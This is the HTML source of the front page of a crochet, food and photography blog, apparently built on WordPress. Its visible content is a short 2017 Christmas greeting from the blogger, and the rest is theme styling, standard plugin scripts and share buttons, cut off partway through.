<!DOCTYPE html><html lang=en-US prefix="og: http://ogp.me/ns#"><head><meta charset=UTF-8><meta http-equiv=X-UA-Compatible content="IE=edge"><link rel=profile href=http://gmpg.org/xfn/11><link rel=pingback href=https://zoomyummy.com/xmlrpc.php><title>Zoom Yummy &#8211; Crochet, Food, Photography</title><meta name=google-site-verification content=3kIMRca0R2G-70vxTKhghuYp3PM4WBO3xMhMIV4q9x0><meta name=msvalidate.01 content=53702401A290CBFE88F6A6B07DC9CF89><meta name=p:domain_verify content=242723ba1d74486bf59ab70e7acafe37><link rel=canonical href=https://zoomyummy.com><link rel=next href=https://zoomyummy.com/page/2><meta property=og:locale content=en_US><meta property=og:type content=website><meta property=og:title content="Zoom Yummy - Crochet, Food, Photography -"><meta property=og:url content=https://zoomyummy.com><meta property=og:site_name content="Zoom Yummy - Crochet, Food, Photography"><meta name=twitter:card content=summary><meta name=twitter:title content="Zoom Yummy - Crochet, Food, Photography -"> <script type=application/ld+json class='yoast-schema-graph yoast-schema-graph--main'>{"@context":"https://schema.org","@graph":[{"@type":"Organization","@id":"https://zoomyummy.com/#organization","name":"","url":"https://zoomyummy.com/","sameAs":[]},{"@type":"WebSite","@id":"https://zoomyummy.com/#website","url":"https://zoomyummy.com/","name":"Zoom Yummy - Crochet, Food, Photography","publisher":{"@id":"https://zoomyummy.com/#organization"},"potentialAction":{"@type":"SearchAction","target":"https://zoomyummy.com/?s={search_term_string}","query-input":"required name=search_term_string"}},{"@type":"WebPage","@id":"https://zoomyummy.com/#webpage","url":"https://zoomyummy.com/","inLanguage":"en-US","name":"Zoom Yummy - Crochet, Food, Photography -","isPartOf":{"@id":"https://zoomyummy.com/#website"},"about":{"@id":"https://zoomyummy.com/#organization"}}]}</script> <link rel=dns-prefetch href=//s0.wp.com><link rel=dns-prefetch href=//s.w.org><link rel=alternate type=application/rss+xml title="Zoom Yummy - Crochet, Food, Photography &raquo; Feed" href=https://zoomyummy.com/feed><link rel=alternate type=application/rss+xml title="Zoom Yummy - Crochet, Food, Photography &raquo; Comments Feed" href=https://zoomyummy.com/comments/feed> <script>window._wpemojiSettings={"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/zoomyummy.com\/wp-includes\/js\/wp-emoji-release.min.js"}};!function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55357,56424,55356,57342,8205,55358,56605,8205,55357,56424,55356,57340],[55357,56424,55356,57342,8203,55358,56605,8203,55357,56424,55356,57340]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings);</script> <style>img.wp-smiley,img.emoji{display:inline !important;border:none !important;box-shadow:none !important;height:1em !important;width:1em !important;margin:0 .07em !important;vertical-align:-0.1em !important;background:none !important;padding:0 !important}</style><style>.wp-pagenavi{margin-left:auto !important;margin-right:auto;!important}</style><link rel=stylesheet id=recent-comments-with-gravatar-css href=https://zoomyummy.com/wp-content/plugins/recent-comments-with-gravatar/style.css type=text/css media=all><link rel=stylesheet id=wp-block-library-css href=https://zoomyummy.com/wp-includes/css/dist/block-library/style.min.css type=text/css media=all><link rel=stylesheet id=cookie-law-info-css href=https://zoomyummy.com/wp-content/plugins/cookie-law-info/public/css/cookie-law-info-public.css type=text/css media=all><link rel=stylesheet id=cookie-law-info-gdpr-css href=https://zoomyummy.com/wp-content/plugins/cookie-law-info/public/css/cookie-law-info-gdpr.css type=text/css media=all><link rel=stylesheet id=edd-styles-css href=https://zoomyummy.com/wp-content/plugins/easy-digital-downloads/templates/edd.min.css type=text/css media=all><link rel=stylesheet id=jpibfi-style-css href=https://zoomyummy.com/wp-content/plugins/jquery-pin-it-button-for-images/css/client.css type=text/css media=all><link rel=stylesheet id=parent-style-css href=https://zoomyummy.com/wp-content/themes/generatepress/style.css type=text/css media=all><link rel=stylesheet id=child-style-css href=https://zoomyummy.com/wp-content/themes/generatepress-child-theme/style.css type=text/css media=all><link rel=stylesheet id=generate-style-grid-css href=https://zoomyummy.com/wp-content/themes/generatepress/css/unsemantic-grid.min.css type=text/css media=all><link rel=stylesheet id=generate-style-css href=https://zoomyummy.com/wp-content/themes/generatepress/style.css type=text/css media=all><style id=generate-style-inline-css>body{background-color:#f9f9f0;color:#3a3a3a}a,a:visited{color:#1e73be;text-decoration:none}a:hover,a:focus,a:active{color:#000}body .grid-container{max-width:1170px}.site-header{background-color:#fff;color:#3a3a3a}.site-header a{color:#3a3a3a}.main-title a,.main-title a:hover,.main-title a:visited{color:#222}.site-description{color:#999}.main-navigation, .main-navigation ul ul{background-color:#fff}.navigation-search input[type="search"],.navigation-search input[type="search"]:active{color:#df0000;background-color:#eee}.navigation-search input[type="search"]:focus{color:#df0000;background-color:#eee}.main-navigation ul ul{background-color:#3f3f3f}.main-navigation .main-nav ul li a,.menu-toggle{color:#2a2a2a}button.menu-toggle:hover,button.menu-toggle:focus,.main-navigation .mobile-bar-items a,.main-navigation .mobile-bar-items a:hover,.main-navigation .mobile-bar-items a:focus{color:#2a2a2a}.main-navigation .main-nav ul ul li a{color:#FFF}.main-navigation .main-nav ul li > a:hover,.main-navigation .main-nav ul li > a:focus,.main-navigation .main-nav ul li.sfHover>a{color:#df0000;background-color:#eee}.main-navigation .main-nav ul ul li > a:hover,.main-navigation .main-nav ul ul li > a:focus,.main-navigation .main-nav ul ul li.sfHover>a{color:#FFF;background-color:#4f4f4f}.main-navigation .main-nav ul .current-menu-item > a, .main-navigation .main-nav ul .current-menu-parent > a, .main-navigation .main-nav ul .current-menu-ancestor>a{color:#333;background-color:#eee}.main-navigation .main-nav ul .current-menu-item > a:hover, .main-navigation .main-nav ul .current-menu-parent > a:hover, .main-navigation .main-nav ul .current-menu-ancestor > a:hover, .main-navigation .main-nav ul .current-menu-item.sfHover > a, .main-navigation .main-nav ul .current-menu-parent.sfHover > a, .main-navigation .main-nav ul .current-menu-ancestor.sfHover>a{color:#333;background-color:#eee}.main-navigation .main-nav ul ul .current-menu-item > a, .main-navigation .main-nav ul ul .current-menu-parent > a, .main-navigation .main-nav ul ul .current-menu-ancestor>a{color:#FFF;background-color:#4f4f4f}.main-navigation .main-nav ul ul .current-menu-item > a:hover, .main-navigation .main-nav ul ul .current-menu-parent > a:hover, .main-navigation .main-nav ul ul .current-menu-ancestor > a:hover,.main-navigation .main-nav ul ul .current-menu-item.sfHover > a, .main-navigation .main-nav ul ul .current-menu-parent.sfHover > a, .main-navigation .main-nav ul ul .current-menu-ancestor.sfHover>a{color:#FFF;background-color:#4f4f4f}.separate-containers .inside-article, .separate-containers .comments-area, .separate-containers .page-header,.one-container .container,.separate-containers .paging-navigation,.inside-page-header{background-color:#fff;color:#333}.entry-meta{color:#888}.entry-meta a, .entry-meta a:visited{color:#666}.entry-meta a:hover{color:#1E73BE}.sidebar .widget{background-color:#FFF;color:#3a3a3a}.sidebar .widget .widget-title{color:#262626}.footer-widgets{background-color:#FFF;color:#3a3a3a}.footer-widgets a, .footer-widgets a:visited{color:#3c6316}.footer-widgets a:hover{color:#df0000}.footer-widgets .widget-title{color:#262626}.site-info{background-color:#222;color:#fff}.site-info a, .site-info a:visited{color:#3c6316}.site-info a:hover{color:#df0000}input[type="text"],input[type="email"],input[type="url"],input[type="password"],input[type="search"],input[type="tel"],textarea{background-color:#FAFAFA;border-color:#CCC;color:#666}input[type="text"]:focus,input[type="email"]:focus,input[type="url"]:focus,input[type="password"]:focus,input[type="search"]:focus,input[type="tel"]:focus,textarea:focus{background-color:#FFF;color:#666;border-color:#BFBFBF}::-webkit-input-placeholder{color:#666}:-moz-placeholder{color:#666}::-moz-placeholder{color:#666}:-ms-input-placeholder{color:#666}button, html input[type="button"],input[type="reset"],input[type="submit"],.button,.button:visited{background-color:#666;color:#FFF}button:hover, html input[type="button"]:hover, input[type="reset"]:hover, input[type="submit"]:hover,.button:hover,button:focus, html input[type="button"]:focus,input[type="reset"]:focus,input[type="submit"]:focus,.button:focus{background-color:#3F3F3F;color:#FFF}.inside-header{padding:20px 20px 5px 20px}.separate-containers .inside-article, .separate-containers .comments-area, .separate-containers .page-header, .separate-containers .paging-navigation, .one-container .site-content{padding:15px 30px 40px 30px}.one-container.right-sidebar .site-main,.one-container.both-right .site-main{margin-right:30px}.one-container.left-sidebar .site-main,.one-container.both-left .site-main{margin-left:30px}.one-container.both-sidebars .site-main{margin:0px 30px 0px 30px}.ignore-x-spacing{margin-right:-30px;margin-bottom:40px;margin-left:-30px}.ignore-xy-spacing{margin:-15px -30px 40px -30px}.main-navigation .main-nav ul li a,.menu-toggle,.main-navigation .mobile-bar-items a{padding-left:20px;padding-right:20px;line-height:40px}.nav-float-right .main-navigation .main-nav ul li a{line-height:40px}.main-navigation .main-nav ul ul li a{padding:10px 20px 10px 20px}.main-navigation ul ul{top:40px}.navigation-search{height:40px;line-height:0px}.navigation-search input{height:40px;line-height:0px}.widget-area .widget{padding:15px 15px 15px 15px}.footer-widgets{padding:20px 0px 40px 0px}.site-info{padding:20px 0px 20px 0px}.right-sidebar.separate-containers .site-main{margin:10px 10px 10px 0px}.left-sidebar.separate-containers .site-main{margin:10px 0px 10px 10px}.both-sidebars.separate-containers .site-main{margin:10px}.both-right.separate-containers .site-main{margin:10px 10px 10px 0px}.separate-containers .site-main{margin-top:10px;margin-bottom:10px}.separate-containers .page-header-image, .separate-containers .page-header-content, .separate-containers .page-header-image-single, .separate-containers .page-header-content-single{margin-top:10px}.both-left.separate-containers .site-main{margin:10px 0px 10px 10px}.separate-containers .inside-right-sidebar,.inside-left-sidebar{margin-top:10px;margin-bottom:10px}.separate-containers .widget, .separate-containers .hentry, .separate-containers .page-header, .widget-area .main-navigation{margin-bottom:10px}.both-left.separate-containers .inside-left-sidebar{margin-right:5px}.both-left.separate-containers .inside-right-sidebar{margin-left:5px}.both-right.separate-containers .inside-left-sidebar{margin-right:5px}.both-right.separate-containers .inside-right-sidebar{margin-left:5px}.menu-item-has-children ul .dropdown-menu-toggle{padding-top:10px;padding-bottom:10px;margin-top:-10px}.menu-item-has-children .dropdown-menu-toggle{padding-right:20px}body,button,input,select,textarea{font-family:Georgia,Times New Roman,Times,serif;font-weight:300;font-size:13px}.main-title{font-family:inherit;font-weight:bold;font-size:45px}.site-description{font-family:inherit;font-size:15px}.main-navigation a,.menu-toggle{font-family:inherit;font-size:15px}.main-navigation .main-nav ul ul li a{font-size:14px}.widget-title{font-family:inherit;font-size:20px}.sidebar .widget, .footer-widgets .widget{font-size:17px}h1{font-family:inherit;font-weight:300;font-size:40px}h2{font-family:inherit;font-weight:300;font-size:30px}h3{font-family:inherit;font-size:20px}.site-info{font-size:16px}@media (max-width:768px){.main-title{font-size:30px}h1{font-size:30px}h2{font-size:25px}}.main-navigation .mobile-bar-items a,.main-navigation .mobile-bar-items a:hover,.main-navigation .mobile-bar-items a:focus{color:#2a2a2a}.main-navigation .mobile-bar-items a{padding-left:20px;padding-right:20px;line-height:40px}.menu-item-has-children ul .dropdown-menu-toggle{padding-top:10px;padding-bottom:10px;margin-top:-10px}.menu-item-has-children .dropdown-menu-toggle{padding-right:20px}.secondary-navigation{background-color:#636363}.widget-area .secondary-navigation{margin-bottom:10px}.secondary-navigation ul ul{background-color:#303030;top:40px}.secondary-navigation .main-nav ul li a,.secondary-navigation .menu-toggle{color:#FFF;font-family:inherit;font-weight:normal;text-transform:none;font-size:13px;padding-left:20px;padding-right:20px;line-height:40px}button.secondary-menu-toggle:hover,button.secondary-menu-toggle:focus{color:#FFF}.secondary-navigation .main-nav ul ul li a{color:#FFF;font-size:12px;padding-left:20px;padding-right:20px;padding-top:10px;padding-bottom:10px}.secondary-navigation .main-nav ul li > a:hover, .secondary-navigation .main-nav ul li > a:focus, .secondary-navigation .main-nav ul li.sfHover>a{color:#FFF;background-color:#303030}.secondary-navigation .main-nav ul ul li > a:hover,.secondary-navigation .main-nav ul ul li > a:focus,.secondary-navigation .main-nav ul ul li.sfHover>a{color:#FFF;background-color:#474747}.secondary-navigation .main-nav ul .current-menu-item > a, .secondary-navigation .main-nav ul .current-menu-parent > a, .secondary-navigation .main-nav ul .current-menu-ancestor>a{color:#222;background-color:#fff}.secondary-navigation .main-nav ul .current-menu-item > a:hover, .secondary-navigation .main-nav ul .current-menu-parent > a:hover, .secondary-navigation .main-nav ul .current-menu-ancestor > a:hover, .secondary-navigation .main-nav ul .current-menu-item.sfHover > a, .secondary-navigation .main-nav ul .current-menu-parent.sfHover > a, .secondary-navigation .main-nav ul .current-menu-ancestor.sfHover>a{color:#222;background-color:#fff}.secondary-navigation .main-nav ul ul .current-menu-item > a, .secondary-navigation .main-nav ul ul .current-menu-parent > a, .secondary-navigation .main-nav ul ul .current-menu-ancestor>a{color:#FFF;background-color:#474747}.secondary-navigation .main-nav ul ul .current-menu-item > a:hover, .secondary-navigation .main-nav ul ul .current-menu-parent > a:hover, .secondary-navigation .main-nav ul ul .current-menu-ancestor > a:hover,.secondary-navigation .main-nav ul ul .current-menu-item.sfHover > a, .secondary-navigation .main-nav ul ul .current-menu-parent.sfHover > a, .secondary-navigation .main-nav ul ul .current-menu-ancestor.sfHover>a{color:#FFF;background-color:#474747}@media (max-width: 1180px){.main-navigation .sticky-logo{margin-left:10px}}.sidebar .navigation-clone .grid-container{max-width:1170px}</style><link rel=stylesheet id=generate-mobile-style-css href=https://zoomyummy.com/wp-content/themes/generatepress/css/mobile.min.css type=text/css media=all><link rel=stylesheet id=generate-child-css href=https://zoomyummy.com/wp-content/themes/generatepress-child-theme/style.css type=text/css media=all><link rel=stylesheet id=fontawesome-css href=https://zoomyummy.com/wp-content/themes/generatepress/css/font-awesome.min.css type=text/css media=all><link rel=stylesheet id=blog-styles-css href=https://zoomyummy.com/wp-content/plugins/gp-premium/addons/generate-blog/functions/css/style.min.css type=text/css media=all><link rel=stylesheet id=generate-secondary-nav-css href=https://zoomyummy.com/wp-content/plugins/gp-premium/addons/generate-secondary-nav/functions/css/style.min.css type=text/css media=all><link rel=stylesheet id=generate-secondary-nav-mobile-css href=https://zoomyummy.com/wp-content/plugins/gp-premium/addons/generate-secondary-nav/functions/css/mobile.min.css type=text/css media=all><link rel=stylesheet id=jetpack_css-css href=https://zoomyummy.com/wp-content/plugins/jetpack/css/jetpack.css type=text/css media=all><link rel=stylesheet id=wp-pagenavi-style-css href=https://zoomyummy.com/wp-content/plugins/wp-pagenavi-style/css/css3_black_glossy.css type=text/css media=all><link rel=stylesheet id=essb_cache_static-b93e278e096ada82f9f8d528e5221d62-css href=https://zoomyummy.com/wp-content/uploads/essb_cache_static/b93e278e096ada82f9f8d528e5221d62.css type=text/css media=all> <script src="https://zoomyummy.com/wp-content/cache/minify/df983.js"></script> <script>var Cli_Data={"nn_cookie_ids":[],"cookielist":[]};var log_object={"ajax_url":"https:\/\/zoomyummy.com\/wp-admin\/admin-ajax.php"};</script> <script src="https://zoomyummy.com/wp-content/cache/minify/a6c57.js"></script> <link rel=https://api.w.org/ href=https://zoomyummy.com/wp-json><link rel=EditURI type=application/rsd+xml title=RSD href=https://zoomyummy.com/xmlrpc.php?rsd><link rel=wlwmanifest type=application/wlwmanifest+xml href=https://zoomyummy.com/wp-includes/wlwmanifest.xml><meta name=generator content="WordPress 5.2"><link rel=shortlink href=https://wp.me/46v2X><meta name=generator content="Easy Digital Downloads v2.9.14"><style>a.pinit-button.custom span{}.pinit-hover{opacity:0.8 !important;filter:alpha(opacity=80) !important}a.pinit-button{border-bottom:0 !important;box-shadow:none !important;margin-bottom:0 !important}a.pinit-button::after{display:none}</style><meta name=description content="Zoom Yummy &#8211; Crochet, Food, Photography &#8211; "><meta name=robots content=noodp,noydir><link rel=canonical href=https://zoomyummy.com><style>.wp-pagenavi{font-size:12px !important}</style><link rel=dns-prefetch href=//v0.wordpress.com><meta name=viewport content="width=device-width, initial-scale=1"> <!--[if lt IE 9]><link rel=stylesheet href=https://zoomyummy.com/wp-content/themes/generatepress/css/ie.min.css> <script src=https://zoomyummy.com/wp-content/themes/generatepress/js/html5shiv.min.js></script> <![endif]--> <script>var essb_settings={"ajax_url":"https:\/\/zoomyummy.com\/wp-admin\/admin-ajax.php","essb3_nonce":"21d1e997a8","essb3_plugin_url":"https:\/\/zoomyummy.com\/wp-content\/plugins\/easy-social-share-buttons3","essb3_stats":false,"essb3_ga":false,"essb3_ga_mode":"simple","blog_url":"https:\/\/zoomyummy.com\/","essb3_postfloat_stay":false,"post_id":55229};</script> <script>var cli_flush_cache=1;</script> <style>.car-collapse .car-yearmonth{cursor:s-resize}</style> <script>jQuery(document).ready(function(){jQuery('.car-collapse').find('.car-monthlisting').hide();jQuery('.car-collapse').find('.car-monthlisting:first').show();jQuery('.car-collapse').find('.car-yearmonth').click(function(){jQuery(this).next('ul').slideToggle('fast');});jQuery('.car-collapse').find('.car-toggler').click(function(){if('Expand All'==jQuery(this).text()){jQuery(this).parent('.car-container').find('.car-monthlisting').show();jQuery(this).text('Collapse All');} else{jQuery(this).parent('.car-container').find('.car-monthlisting').hide();jQuery(this).text('Expand All');} return false;});});</script> <link rel=icon href=https://zoomyummy.com/wp-content/uploads/2015/12/zoomyummy-favicon-1-32x32.png sizes=32x32><link rel=icon href=https://zoomyummy.com/wp-content/uploads/2015/12/zoomyummy-favicon-1-192x192.png sizes=192x192><link rel=apple-touch-icon-precomposed href=https://zoomyummy.com/wp-content/uploads/2015/12/zoomyummy-favicon-1-180x180.png><meta name=msapplication-TileImage content=https://zoomyummy.com/wp-content/uploads/2015/12/zoomyummy-favicon-1-270x270.png><style></style><link rel=stylesheet type=text/css id=wp-custom-css href="https://zoomyummy.com/?custom-css=b54ae68ab5"> <style type="text/css"> .wp-pagenavi{margin-left:auto !important; margin-right:auto; !important} </style> </head><body itemtype=http://schema.org/Blog itemscope=itemscope class="home blog wp-custom-logo post-image-below-header post-image-aligned-center secondary-nav-above-header secondary-nav-aligned-right sticky-menu-fade navigation-logo-sticky generatepress both-sidebars nav-below-header contained-header separate-containers active-footer-widgets-1 nav-aligned-center header-aligned-center dropdown-hover"> <a class="screen-reader-text skip-link" href=#content title="Skip to content">Skip to content</a><header itemtype=http://schema.org/WPHeader itemscope=itemscope id=masthead class="site-header grid-container grid-parent"><div class=inside-header><div class=site-logo> <a href=https://zoomyummy.com/ title="Zoom Yummy &#8211; Crochet, Food, Photography" rel=home> <img class=header-image src=https://zoomyummy.com/wp-content/uploads/2013/09/HEADER-POLAROID-1100X140-central-version-five-pictures-copy.jpg alt="Zoom Yummy &#8211; Crochet, Food, Photography" title="Zoom Yummy &#8211; Crochet, Food, Photography"> </a></div></div></header><nav itemtype=http://schema.org/SiteNavigationElement itemscope=itemscope id=site-navigation class="main-navigation grid-container grid-parent"><div class="inside-navigation grid-container grid-parent"> <button class=menu-toggle aria-controls=primary-menu aria-expanded=false> <span class=mobile-menu>Menu</span> </button><div id=primary-menu class=main-nav><ul id=menu-main-menu class=" menu sf-menu"><li id=menu-item-26762 class="menu-item menu-item-type-post_type menu-item-object-page menu-item-26762"><a href=https://zoomyummy.com/blog/>Blog</a></li><li id=menu-item-23924 class="menu-item menu-item-type-post_type menu-item-object-page menu-item-23924"><a href=https://zoomyummy.com/about/>About</a></li><li id=menu-item-23925 class="menu-item menu-item-type-post_type menu-item-object-page menu-item-23925"><a href=https://zoomyummy.com/contact/>Contact</a></li><li id=menu-item-23926 class="menu-item menu-item-type-post_type menu-item-object-page menu-item-23926"><a href=https://zoomyummy.com/archives/>Blog Archives</a></li><li id=menu-item-23927 class="menu-item menu-item-type-post_type menu-item-object-page menu-item-23927"><a href=https://zoomyummy.com/crafty-ideas/>Crafty Ideas</a></li><li id=menu-item-23928 class="menu-item menu-item-type-post_type menu-item-object-page menu-item-23928"><a href=https://zoomyummy.com/photography/>Photography</a></li><li id=menu-item-23929 class="menu-item menu-item-type-post_type menu-item-object-page menu-item-23929"><a href=https://zoomyummy.com/recipes/>Recipes</a></li><li id=menu-item-30192 class="menu-item menu-item-type-custom menu-item-object-custom menu-item-30192"><a href=/shop/>Crochet and Knitting Pattern Shop</a></li></ul></div></div></nav><div class="page-header-image grid-container grid-parent generate-page-header generate-blog-page-header"> <img width=1100 height=140 src=https://zoomyummy.com/wp-content/uploads/2013/09/HEADER-POLAROID-1100X140-central-version-five-pictures-copy.jpg class="attachment-full size-full" alt itemprop=image srcset="https://zoomyummy.com/wp-content/uploads/2013/09/HEADER-POLAROID-1100X140-central-version-five-pictures-copy.jpg 1100w, https://zoomyummy.com/wp-content/uploads/2013/09/HEADER-POLAROID-1100X140-central-version-five-pictures-copy-600x76.jpg 600w, https://zoomyummy.com/wp-content/uploads/2013/09/HEADER-POLAROID-1100X140-central-version-five-pictures-copy-1024x130.jpg 1024w" sizes="(max-width: 1100px) 100vw, 1100px"></div><div id=page class="hfeed site grid-container container grid-parent"><div id=content class=site-content><div style="width:100%; padding-top: 10px; padding-bottom: 10px; background-color: #fff;"><form method=get class=search-form action=https://zoomyummy.com/> <label> <span class=screen-reader-text>Search for:</span> <input type=search class=search-field placeholder="Search &hellip;" value name=s title="Search for:"> </label> <input type=submit class=search-submit value=Search></form></div><div id=primary class="content-area grid-parent push-20 grid-60 tablet-push-20 tablet-grid-60"><main id=main class=site-main><article id=post-55229 class="post-55229 post type-post status-publish format-standard hentry category-uncategorized" itemtype=http://schema.org/CreativeWork itemscope=itemscope><div class=inside-article><header class=entry-header><h2 class="entry-title" itemprop="headline"><a href=https://zoomyummy.com/2017/12/23/merry-christmas-7/ rel=bookmark>Merry Christmas!</a></h2><div class=entry-meta> <span class=posted-on><a href=https://zoomyummy.com/2017/12/23/merry-christmas-7/ title="7:21 pm" rel=bookmark><time class="entry-date published" datetime=2017-12-23T19:21:39+01:00 itemprop=datePublished>December 23, 2017</time></a></span> <span class=byline><span class="author vcard" itemtype=http://schema.org/Person itemscope=itemscope itemprop=author>by <a class="url fn n" href=https://zoomyummy.com/author/zoomyummy/ title="View all posts by zoomyummy" rel=author itemprop=url><span class=author-name itemprop=name>zoomyummy</span></a></span></span></div></header><div class=entry-content itemprop=text> <input class=jpibfi type=hidden><p><img src=https://zoomyummy.com/wp-content/uploads/2017/12/christmas-2017-G-wm.jpg alt="Merry Christmas 2017" width=630 height=945 class="aligncenter size-full wp-image-55230" srcset="https://zoomyummy.com/wp-content/uploads/2017/12/christmas-2017-G-wm.jpg 630w, https://zoomyummy.com/wp-content/uploads/2017/12/christmas-2017-G-wm-267x400.jpg 267w" sizes="(max-width: 630px) 100vw, 630px" data-jpibfi-post-excerpt data-jpibfi-post-url=https://zoomyummy.com/2017/12/23/merry-christmas-7/ data-jpibfi-post-title="Merry Christmas!" data-jpibfi-src=https://zoomyummy.com/wp-content/uploads/2017/12/christmas-2017-G-wm.jpg></p><blockquote><p>Dear friends!</p><p>I wish you the most wonderful <em>Holiday Season </em>filled with happiness and cheer!</p><p>Thank you for visiting this little place!</p><p>Love you!</p><p>Petra ♡♡♡</p></blockquote><div class="essb_links essb_counters essb_counter_modern_top essb_displayed_bottom essb_share essb_template_clear-retina essb_768329166 essb_links_center print-no" id=essb_displayed_bottom_768329166 data-essb-postid=55229 data-essb-position=bottom data-essb-button-style=icon data-essb-template=clear-retina data-essb-counter-pos=left data-essb-url=http://zoomyummy.com/2017/12/23/merry-christmas-7/ data-essb-twitter-url=http://zoomyummy.com/2017/12/23/merry-christmas-7/ data-essb-instance=768329166><ul class="essb_links_list essb_force_hide_name essb_force_hide"><li class="essb_item essb_totalcount_item" style="display: none !important;" data-counter-pos=left><span class="essb_totalcount essb_t_l" title="Total: "><span class=essb_total_text>Total: </span><span class=essb_t_nb>122</span></span></li><li class="essb_item essb_link_print nolightbox"> <span class=essb_counter data-cnt=15 data-cnt-short=15>15</span><a href="http://www.printfriendly.com/print/?url=http://zoomyummy.com/2017/12/23/merry-christmas-7/" title onclick="essb.window(&#39;http://www.printfriendly.com/print/?url=http://zoomyummy.com/2017/12/23/merry-christmas-7/&#39;,&#39;print_friendly&#39;,&#39;768329166&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_print"></span><span class="essb_network_name essb_noname"></span></a></li><li class="essb_item essb_link_facebook nolightbox"> <span class=essb_counter data-cnt=0 data-cnt-short=0>0</span><a href="https://www.facebook.com/sharer/sharer.php?u=http://zoomyummy.com/2017/12/23/merry-christmas-7/&t=Merry+Christmas%21" title onclick="essb.window(&#39;https://www.facebook.com/sharer/sharer.php?u=http://zoomyummy.com/2017/12/23/merry-christmas-7/&t=Merry+Christmas%21&#39;,&#39;facebook&#39;,&#39;768329166&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_facebook"></span><span class="essb_network_name essb_noname"></span></a></li><li class="essb_item essb_link_twitter nolightbox"> <span class=essb_counter data-cnt=36 data-cnt-short=36>36</span><a href=# title onclick="essb.window(&#39;https://twitter.com/intent/tweet?text=Merry+Christmas%21&amp;url=http://zoomyummy.com/2017/12/23/merry-christmas-7/&amp;counturl=http://zoomyummy.com/2017/12/23/merry-christmas-7/&#39;,&#39;twitter&#39;,&#39;768329166&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_twitter"></span><span class="essb_network_name essb_noname"></span></a></li><li class="essb_item essb_link_google nolightbox"> <span class=essb_counter data-cnt=22 data-cnt-short=22>22</span><a href="https://plus.google.com/share?url=http://zoomyummy.com/2017/12/23/merry-christmas-7/" title onclick="essb.window(&#39;https://plus.google.com/share?url=http://zoomyummy.com/2017/12/23/merry-christmas-7/&#39;,&#39;google&#39;,&#39;768329166&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_google"></span><span class="essb_network_name essb_noname"></span></a></li><li class="essb_item essb_link_pinterest nolightbox"> <span class=essb_counter data-cnt=0 data-cnt-short=0>0</span><a href=# title onclick="essb.pinterest_picker(&#39;768329166&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_pinterest"></span><span class="essb_network_name essb_noname"></span></a></li><li class="essb_item essb_link_stumbleupon nolightbox"> <span class=essb_counter data-cnt=10 data-cnt-short=10>10</span><a href="http://www.stumbleupon.com/badge/?url=http://zoomyummy.com/2017/12/23/merry-christmas-7/" title onclick="essb.window(&#39;http://www.stumbleupon.com/badge/?url=http://zoomyummy.com/2017/12/23/merry-christmas-7/&#39;,&#39;stumbleupon&#39;,&#39;768329166&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_stumbleupon"></span><span class="essb_network_name essb_noname"></span></a></li><li class="essb_item essb_link_mail nolightbox"> <span class=essb_counter data-cnt=39 data-cnt-short=39>39</span><a href=# title onclick="essb_open_mailform(&#39;768329166&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_mail"></span><span class="essb_network_name essb_noname"></span></a></li><li class="essb_item essb_link_more nolightbox"> <a href=# title onclick="essb.toggle_more_popup(&#39;768329166&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_more"></span><span class="essb_network_name essb_noname"></span></a></li></ul></div><div class="essb_morepopup essb_morepopup_768329166 essb_morepopup_bottom" style=display:none;> <a href=# class=essb_morepopup_close onclick="essb.toggle_less_popup('768329166'); return false;"><i class=essb_icon_close></i></a><div class="essb_morepopup_content essb_morepopup_content_768329166"><div class="essb_links essb_displayed_more_popup essb_share essb_template_clear-retina essb_889394355 essb_width_columns_3 essb_links_center print-no" id=essb_displayed_more_popup_889394355 data-essb-postid=55229 data-essb-position=more_popup data-essb-button-style=button data-essb-template=clear-retina data-essb-counter-pos=left data-essb-url=http://zoomyummy.com/2017/12/23/merry-christmas-7/ data-essb-twitter-url=http://zoomyummy.com/2017/12/23/merry-christmas-7/ data-essb-instance=889394355><ul class=essb_links_list><li class="essb_item essb_link_facebook nolightbox"> <a href="https://www.facebook.com/sharer/sharer.php?u=http://zoomyummy.com/2017/12/23/merry-christmas-7/&t=Merry+Christmas%21" title 